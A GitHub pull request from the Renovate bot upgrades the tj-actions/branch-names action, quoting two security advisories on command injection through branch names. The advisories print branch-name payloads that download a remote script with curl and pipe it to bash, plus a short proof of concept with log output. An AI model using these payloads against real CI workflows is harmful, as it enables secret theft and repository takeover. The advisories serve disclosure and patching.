Skip to content

chore(deps): update tj-actions/branch-names action to v9 [security]#20

Open
renovate[bot] wants to merge 1 commit into
masterfrom
renovate/github-tags-tj-actions-branch-names-vulnerability/VF-000
Open

chore(deps): update tj-actions/branch-names action to v9 [security]#20
renovate[bot] wants to merge 1 commit into
masterfrom
renovate/github-tags-tj-actions-branch-names-vulnerability/VF-000

Conversation

@renovate
Copy link
Copy Markdown

@renovate renovate Bot commented Mar 1, 2026
edited
Loading

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package Type Update Change
tj-actions/branch-names action major v6v9

tj-actions/branch-names's Improper Sanitization of Branch Name Leads to Arbitrary Code Injection

CVE-2023-49291 / GHSA-8v8w-v8xg-79rf

More information

Details

Summary

The tj-actions/branch-names GitHub Actions references the github.event.pull_request.head.ref and github.head_ref context variables within a GitHub Actions run step. The head ref variable is the branch name and can be used to execute arbitrary code using a specially crafted branch name.

Details

The vulnerable code is within the action.yml file the run step references the value directly, instead of a sanitized variable.

runs:
  using: "composite"
  steps:
    - id: branch
      run: |
        # "Set branch names..."
        if [[ "${{ github.ref }}" != "refs/tags/"* ]]; then
          BASE_REF=$(printf "%q" "${{ github.event.pull_request.base.ref || github.base_ref }}")
          HEAD_REF=$(printf "%q" "${{ github.event.pull_request.head.ref || github.head_ref }}")
          REF=$(printf "%q" "${{ github.ref }}")

An attacker can use a branch name to inject arbitrary code, for example: Test")${IFS}&&${IFS}{curl,-sSfL,gist.githubusercontent.com/RampagingSloth/72511291630c7f95f0d8ffabb3c80fbf/raw/inject.sh}${IFS}|${IFS}bash&&echo${IFS}$("foo will download and run a script from a Gist. This allows an attacker to inject a payload of arbitrary complexity.

Impact

An attacker can use this vulnerability to steal secrets from or abuse GITHUB_TOKEN permissions.

Reference

Severity

  • CVSS Score: 9.3 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

tj-actions/branch-names has a Command Injection Vulnerability

CVE-2025-54416 / GHSA-gq52-6phf-x2r6

More information

Details

Overview

A critical vulnerability has been identified in the tj-actions/branch-names GitHub Action workflow which allows arbitrary command execution in downstream workflows. This issue arises due to inconsistent input sanitization and unescaped output, enabling malicious actors to exploit specially crafted branch names or tags. While internal sanitization mechanisms have been implemented, the action outputs remain vulnerable, exposing consuming workflows to significant security risks.

Technical Details

The vulnerability stems from the unsafe use of the eval printf "%s" pattern within the action's codebase. Although initial sanitization using printf "%q" properly escapes untrusted input, subsequent unescaping via eval printf "%s" reintroduces command injection risks. This unsafe pattern is demonstrated in the following code snippet:

echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT"
echo "head_ref_branch=$(eval printf "%s" "$HEAD_REF")" >> "$GITHUB_OUTPUT"
echo "ref_branch=$(eval printf "%s" "$REF_BRANCH")" >> "$GITHUB_OUTPUT"

This approach allows attackers to inject arbitrary commands into workflows consuming these outputs, as shown in the Proof-of-Concept (PoC) below.

Proof-of-Concept (PoC)
  1. Create a branch with the name $(curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash).
  2. Trigger the vulnerable workflow by opening a pull request into the target repository.
  3. Observe arbitrary code execution in the workflow logs.

Example output:

Running on a pull request branch.
Run echo "Running on pr: $({curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash)"
  echo "Running on pr: $({curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash)"
  shell: /usr/bin/bash -e {0}
Running on pr: === PoC script executed successfully ===
Runner user: runner
Impact

This vulnerability enables arbitrary command execution in repositories consuming outputs from tj-actions/branch-names. The severity of the impact depends on the permissions granted to the GITHUB_TOKEN and the context of the triggering event. Potential consequences include:

  • Theft of sensitive secrets stored in the repository.
  • Unauthorized write access to the repository.
  • Compromise of the repository's integrity and security.
Mitigation and Resolution

To address this vulnerability, the unsafe eval printf "%s" pattern must be replaced with safer alternatives. Specifically, direct printf calls can achieve the same functionality without unescaping shell-unsafe characters. Below is the recommended fix:

printf "base_ref_branch=%s\n" "$BASE_REF" >> "$GITHUB_OUTPUT"
printf "head_ref_branch=%s\n" "$HEAD_REF" >> "$GITHUB_OUTPUT"
printf "ref_branch=%s\n" "$REF_BRANCH" >> "$GITHUB_OUTPUT"
printf "tag=%s\n" "$TAG" >> "$GITHUB_OUTPUT"

This approach ensures that all outputs remain properly escaped and safe for downstream consumption.

Recommendations
  1. Immediate Action: Developers using the tj-actions/branch-names workflow should update their workflows to latest major version v9.
References

Severity

  • CVSS Score: 9.1 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Release Notes

tj-actions/branch-names (tj-actions/branch-names)

v9.0.0

Compare Source

🔄 Update

  • Update update-readme.yml (5250492) - (Tonye Jack)
  • Update update-readme.yml (a2bc495) - (Tonye Jack)
  • Update README.md (169ddc1) - (Tonye Jack)
  • Update README.md (4d35052) - (Tonye Jack)
  • Updated README.md (#​423)

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (6be34a8) - (github-actions[bot])

⬆️ Upgrades

  • Upgraded from v9.0.0 -> v9.0.1 (#​424)

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (c0714e7) - (github-actions[bot])

v9

Compare Source

🔄 Update

  • Update update-readme.yml (5250492) - (Tonye Jack)
  • Update update-readme.yml (a2bc495) - (Tonye Jack)
  • Update README.md (169ddc1) - (Tonye Jack)
  • Update README.md (4d35052) - (Tonye Jack)
  • Updated README.md (#​423)

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (6be34a8) - (github-actions[bot])

⬆️ Upgrades

  • Upgraded from v9.0.0 -> v9.0.1 (#​424)

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (c0714e7) - (github-actions[bot])

v8.2.1

Compare Source

🔄 Update

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (f904073) - (github-actions[bot])

⚙️ Miscellaneous Tasks

🛡️ Security

⬆️ Upgrades

  • Upgraded from v8.2.0 -> v8.2.1 (#​417)

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (46ae71d) - (github-actions[bot])

v8.2.0

Compare Source

🔄 Update

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (f904073) - (github-actions[bot])

⚙️ Miscellaneous Tasks

🛡️ Security

⬆️ Upgrades

  • Upgraded from v8.2.0 -> v8.2.1 (#​417)

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (46ae71d) - (github-actions[bot])

v8.1.0

Compare Source

🚀 Features

  • Add support for replace forward slashes with hyphens (#​412) (af40635) - (Tonye Jack)

➖ Remove

  • Deleted .github/workflows/rebase.yml (c209967) - (Tonye Jack)

🔄 Update

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (47dfeca) - (github-actions[bot])

  • Update update-readme.yml (c9cf6f9) - (Tonye Jack)

⚙️ Miscellaneous Tasks

⬆️ Upgrades

v8.0.2

Compare Source

🚀 Features

  • Add support for replace forward slashes with hyphens (#​412) (af40635) - (Tonye Jack)

➖ Remove

  • Deleted .github/workflows/rebase.yml (c209967) - (Tonye Jack)

🔄 Update

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (47dfeca) - (github-actions[bot])

  • Update update-readme.yml (c9cf6f9) - (Tonye Jack)

⚙️ Miscellaneous Tasks

⬆️ Upgrades

v8.0.1

Compare Source

🚀 Features

  • Add support for strip_branch_prefix (#​406) (c83c87a) - (Tonye Jack)

🔄 Update

⚙️ Miscellaneous Tasks

⬆️ Upgrades

v8.0.0

Compare Source

📦 Bumps

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.

updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (534653b) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.

updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (6fa5c81) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.

updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (8e55874) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.

updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (13adcfd) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.

updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (a3fff96) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.

updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (0f8131e) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.

updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (ca2778e) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.

updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (42c5d88) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.

updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (265f806) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.

updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (ac6ee7a) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.

updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (88cf81d) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.

updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (da72ca7) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.

updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (bc0c064) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.

updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (cc62037) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.

updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (e166d47) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.

updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (b9529d4) - (dependabot[bot])

➖ Remove

  • Deleted renovate.json (394802c) - (Tonye Jack)

🔄 Update

Co-authored-by: jackton1 <17484350+jackton1@​users.noreply.github.com> (82ee4e6) - (tj-actions[bot])

  • Update README.md (658be2f) - (Tonye Jack)
  • Updated README.md (2e715d5) - (repo-ranger[bot])
  • Updated README.md (f24d748) - (jackton1)

👷 CI/CD

  • deps: Bump actions/checkout from 4.1.7 to 4.2.0 (#​393) (f938022) - (dependabot[bot])
  • deps: Bump peter-evans/create-pull-request from 6 to 7 (#​391) (932563e) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.4 to 4.1.6 (7f4e864) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.4 to 4.1.6 (ba1a03f) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.4 to 4.1.5 (ce69956) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.4 to 4.1.5 (b3bcd8d) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.4 to 4.1.5 (965b6cd) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.4 to 4.1.5 (2d945e6) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.4 to 4.1.5 (7e6b6a1) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.4 to 4.1.5 (1bd7d17) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.4 to 4.1.5 (4150064) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.3 to 4.1.4 (dae786c) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.3 (e584617) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (2a77671) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (9a1de3d) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (e672ffd) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (669f409) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (28c5871) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (95c4b88) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (cace666) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (1d19061) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (b3e4e14) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (7ee7b07) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (11faa5b) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (b52a6ba) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (0278465) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (3efec7d) - (dependabot[bot])

📚 Documentation

  • Update checkout action (#​286) (1c741b4) - (Raphael Boidol)
  • Add boidolr as a contributor for doc (#​287) (1c68030) - (allcontributors[bot])

📝 Other

Note

PR body was truncated to here.

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot added dependencies Pull requests that update a dependency file ready for review labels Mar 1, 2026
@renovate renovate Bot requested a review from effervescentia March 1, 2026 06:44
@sonarqubecloud
Copy link
Copy Markdown

sonarqubecloud Bot commented Mar 1, 2026

Quality Gate Passed Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud

@renovate renovate Bot changed the title chore(deps): update tj-actions/branch-names action to v9 [security] chore(deps): update tj-actions/branch-names action to v9 [security] - autoclosed Apr 15, 2026
@renovate renovate Bot closed this Apr 15, 2026
@renovate renovate Bot deleted the renovate/github-tags-tj-actions-branch-names-vulnerability/VF-000 branch April 15, 2026 12:06
@renovate renovate Bot changed the title chore(deps): update tj-actions/branch-names action to v9 [security] - autoclosed chore(deps): update tj-actions/branch-names action to v9 [security] Apr 19, 2026
@renovate renovate Bot reopened this Apr 19, 2026
@renovate renovate Bot force-pushed the renovate/github-tags-tj-actions-branch-names-vulnerability/VF-000 branch from 201fb7e to 8ac4c60 Compare April 19, 2026 07:34
@sonarqubecloud
Copy link
Copy Markdown

sonarqubecloud Bot commented Apr 19, 2026

Quality Gate Passed Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@effervescentia effervescentia Awaiting requested review from effervescentia

At least 1 approving review is required to merge this pull request.

Assignees

No one assigned

Labels

dependencies Pull requests that update a dependency file ready for review

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

0 participants